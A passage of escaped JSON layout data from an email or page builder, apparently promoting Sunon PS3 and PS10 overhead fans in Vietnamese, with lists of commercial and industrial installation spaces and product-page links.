\\":\\\"#ced4d9\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_6\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_11\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"4K3wt6myoh\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"SgATb3r0T6\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ah32Ffe6qG\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Andale Mono\\\",\\\"value\\\":\\\"andale mono,times\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#a87f6b\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"100%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 100%;\\\\\\\"><span style=\\\\\\\"font-size: 20px; line-height: 20px; font-family: impact, chicago;\\\\\\\">Overhead Commercial Fans<br \\/><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"6p78_Qp9z-\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Crimson Text\\\",\\\"value\\\":\\\"\'Crimson Text\',serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Crimson+Text:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"15px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_4\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u1ee8ng d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t trong v\\u0103n ph\\u00f2ng, th\\u01b0\\u01a1ng m\\u1ea1i:\\\"}},{\\\"id\\\":\\\"XdVkFWjOPs\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 19.6px; font-family: inherit;\\\\\\\">Kh\\u00f4ng gian th\\u01b0\\u01a1ng m\\u1ea1i<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 19.6px; font-family: inherit;\\\\\\\">V\\u0103n ph\\u00f2ng l\\u00e0m vi\\u1ec7c<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 19.6px; font-family: inherit;\\\\\\\">Tr\\u1ea1m d\\u1eebng ch\\u00e2n, nh\\u00e0 ga<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 19.6px; font-family: inherit;\\\\\\\">Khu tr\\u01b0ng b\\u00e0y, tr\\u01b0\\u1eddng h\\u1ecdc..<\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"dNPEQKlphk\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-canh-lon-powerful-s3\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#079442\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":false,\\\"width\\\":\\\"100%\\\"},\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_9\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM - SUNON PS3<br \\/><\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":293,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"faFameNYum\\\",\\\"contents\\\":[{\\\"id\\\":\\\"X-k_UyGLeU\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677162646997-sunon_ps3.jpg\\\",\\\"width\\\":626,\\\"height\\\":626},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_11\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_9\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"TV2ETRDW8d\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"gpOG61yoCC\\\",\\\"contents\\\":[{\\\"id\\\":\\\"JuYybc7-AI\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#ced4d9\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_8\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_15\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_12\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"jRFkE4gPAJ\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"YVVJoBNmzW\\\",\\\"contents\\\":[{\\\"id\\\":\\\"APL-cLbiwR\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677162712353-sunon_10_ps10.jpg\\\",\\\"width\\\":626,\\\"height\\\":626},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_5\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_12\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"QP2JllxjiG\\\",\\\"contents\\\":[{\\\"id\\\":\\\"k1tfnnM95-\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Andale Mono\\\",\\\"value\\\":\\\"andale mono,times\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 20px; line-height: 28px; font-family: impact, chicago;\\\\\\\">Overhead Industrial Fans<br \\/><\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"5LoMA1zolV\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h3\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Book Antiqua\\\",\\\"value\\\":\\\"book antiqua,palatino\\\",\\\"url\\\":\\\"\\\",\\\"defaultFont\\\":true},\\\"fontSize\\\":\\\"15px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_2\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u1ee8ng d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t trong c\\u00f4ng nghi\\u1ec7p:\\\"}},{\\\"id\\\":\\\"AJB_1Jl1NG\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Lato\\\",\\\"value\\\":\\\"\'Lato\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#0e64a3\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"100%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 100%; text-align: center;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\\\\\">Nh\\u00e0 x\\u01b0\\u1edfng, khu s\\u1ea3n xu\\u1ea5t<br \\/><\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 100%; text-align: center;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\\\\\">Ch\\u1ebf bi\\u1ebfn, gia c\\u00f4ng c\\u00f4ng nghi\\u1ec7p<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 100%; text-align: center;\\\\\\\"><span style=\\\\\\\"font-size: 14px; line-height: 14px; font-family: inherit;\\\\\\\">Trang tr\\u1ea1i, s\\u1ea3n xu\\u1ea5t n\\u00f4ng nghi\\u1ec7p<\\/span><\\/p>\\\\n<p style=\\\\\\\"line-height: 100%; text-align: center;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 14px; font-size: 14px;\\\\\\\">Kho ch\\u1ee9a h\\u00e0ng...<\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"Cyod4r4e9V\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"15px 10px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-canh-lon-powerful-s10\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#079442\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":false,\\\"width\\\":\\\"100%\\\"},\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{\\\"borderTopColor\\\":\\\"#CCC\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderLeftColor\\\":\\\"#CCC\\\",\\\"borderLeftStyle\\\":\\\"solid\\\",\\\"borderLeftWidth\\\":\\\"1px\\\",\\\"borderRightColor\\\":\\\"#CCC\\\",\\\"borderRightStyle\\\":\\\"solid\\\",\\\"borderRightWidth\\\":\\\"1px\\\",\\\"borderBottomColor\\\":\\\"#CCC\\\",\\\"borderBottomStyle\\\":\\\"solid\\\",\\\"borderBottomWidth\\\":\\\"1px\\\"},\\\"borderRadius\\\":\\\"1px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_8\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM TH\\u00caM - SUNON PS10<br \\/><\\/span><\\/strong>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":293,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_13\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"#ffffff\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_10\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"pjWrQTrxuK\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"sNEnT-pN9t\\\",\\\"contents\\\":[{\\\"id\\\":\\\"izld17o_ur\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h1\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"22px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_1\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u1ee8ng d\\u1ee5ng l\\u1eafp \\u0111\\u1eb7t c\\u00e1c kh\\u00f4ng gian c\\u1ea7n l\\u00e0m m\\u00e1t:\\\"}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_21\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_17\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"q3zqkSqyt3\\\",\\\"cells\\\":[1,1],\\\"columns\\\":[{\\\"id\\\":\\\"hgBSR_xZLi\\\",\\\"contents\\\":[{\\\"id\\\":\\\"eL3sD9sX6L\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Global Font\\\",\\\"value\\\":\\\"inherit\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_12\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<ul style=\\\\\\\"list-style-type: square;\\\\\\\">\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">Nh\\u00e0 kho h\\u00e0ng b\\u00e1n l\\u1ebb di\\u1ec7n t\\u00edch nh\\u1ecf<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">Trung t\\u00e2m Th\\u01b0\\u01a1ng m\\u1ea1i, showroom xe h\\u01a1i<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">Nh\\u00e0 \\u1edf bi\\u1ec7t th\\u1ef1, nh\\u00e0 v\\u01b0\\u1eddn, chung c\\u01b0 duplex<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">Ph\\u00f2ng kh\\u00e1ch, n\\u01a1i l\\u00e0m vi\\u1ec7c kh\\u00f4ng gian m\\u1edf<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">Nh\\u00e0 h\\u00e0ng qu\\u00e1n ngo\\u00e0i tr\\u1eddi<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">V\\u0103n ph\\u00f2ng l\\u00e0m vi\\u1ec7c l\\u1edbn<\\/li>\\\\n<li style=\\\\\\\"line-height: 19.6px;\\\\\\\">S\\u1ea3nh ti\\u1ebfp \\u0111\\u00f3n - ph\\u00f2ng h\\u1ed9i 